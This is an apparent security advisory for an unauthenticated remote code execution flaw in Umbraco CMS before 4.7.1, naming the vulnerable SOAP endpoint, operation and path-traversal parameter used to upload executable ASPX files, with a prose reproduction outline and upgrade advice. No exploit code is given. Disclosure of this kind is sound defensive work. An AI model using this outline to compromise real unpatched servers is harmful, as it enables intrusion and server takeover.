Umbraco CMS Unauthenticated Remote Code Execution Vulnerability

A remote code execution vulnerability has been identified in Umbraco CMS versions prior to 4.7.1. This vulnerability exists in the codeEditorSave.asmx SOAP endpoint, which allows unauthenticated file uploads through the SaveDLRScript operation. Exploitation of a path traversal vulnerability in the fileName parameter enables attackers to upload malicious ASPX scripts to the web-accessible /umbraco/ directory, where the scripts can be executed remotely.

Impact

Exploitation of this vulnerability allows for unauthorized remote code execution on the server where Umbraco CMS is hosted.

Reproduction

The vulnerability can be reproduced by sending a SOAP request to the codeEditorSave.asmx endpoint. The request must include a crafted fileName parameter that exploits the path traversal vulnerability, allowing the uploaded file to be written into the /umbraco/ directory. Once the file is uploaded, it can be executed remotely, leading to code execution on the server.

Remediation

Users are advised to upgrade to Umbraco CMS version 4.7.1 or later, and to apply security patches promptly.